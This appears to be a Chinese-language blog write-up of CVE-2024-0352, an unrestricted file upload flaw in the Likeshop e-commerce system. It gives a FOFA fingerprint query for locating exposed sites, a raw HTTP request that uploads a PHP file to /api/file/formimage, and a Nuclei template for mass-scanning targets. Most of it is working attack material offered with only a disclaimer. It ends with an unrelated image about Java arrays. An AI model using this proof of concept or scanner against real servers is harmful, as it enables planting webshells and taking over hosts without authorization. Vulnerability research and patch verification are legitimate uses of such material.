免责声明:
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
一:漏洞描述
Likeshop是一个100%开源免费的B2B2C多商户商城系统,支持官方旗舰店,商家入驻,平台抽佣+商家独立结算,统一下单+订单拆分等功能。该产品存在任意文件上传,攻击者可通过此漏洞上传木马获取服务器权限。
二:漏洞影响版本
version<= 2.5.7.20210311
三:网络空间测绘查询
fofa
icon_hash="874152924"
四:漏洞复现
POC:
POST /api/file/formimage HTTP/2
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip, deflate------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="test.php"
Content-Type: application/x-phpThis page has a vulnerability!
------WebKitFormBoundarygcflwtei--
批量检测
id: CVE-2024-0352info:name: Likeshop < 2.5.7.20210311 - Arbitrary File Uploadauthor: CookieHanHoan,babybash,samuelsamuelsamuelseverity: highdescription: |A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434impact: |The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.remediation: Update to the latest versionreference:- https://nvd.nist.gov/vuln/detail/CVE-2024-0352- https://note.zhaoj.in/share/ciwYj7QXC4sZ- https://vuldb.com/?ctiid.250120- https://vuldb.com/?id.250120classification:cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:Lcvss-score: 7.3cve-id: CVE-2024-0352cwe-id: CWE-434metadata:verified: truemax-request: 1vendor: likeshopshodan-query: http.favicon.hash:874152924tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive
variables:filename: "{{rand_base(6)}}"http:- raw:- |POST /api/file/formimage HTTP/1.1Host: {{Hostname}}Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwteiUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36------WebKitFormBoundarygcflwteiContent-Disposition: form-data; name="file";filename="{{filename}}.php"Content-Type: application/x-php{{randstr}}------WebKitFormBoundarygcflwtei--matchers:- type: dsldsl:- 'status_code == 200'- 'contains(body, "\"name\":\"{{filename}}.php\"")'- 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'condition: andextractors:- type: jsonpart: bodyjson:- ".data.url"
# digest: 4a0a00473045022100deb88d0d5f3f0af25df24379957bd65e84c9ce39a4d8c4aa791388f67b61c25002207f6c80534d7839ef8754e96b5ea1c543908e9c77315afcb83a24e6022d227026:922c64590222798bb761d5b6d8e72950
![List转数组,使用toArray时,new String[0] 的数组空间大小怎么传?](https://img-blog.csdnimg.cn/direct/a4f79cfa58ea459298c9e5fcadd438b6.png)
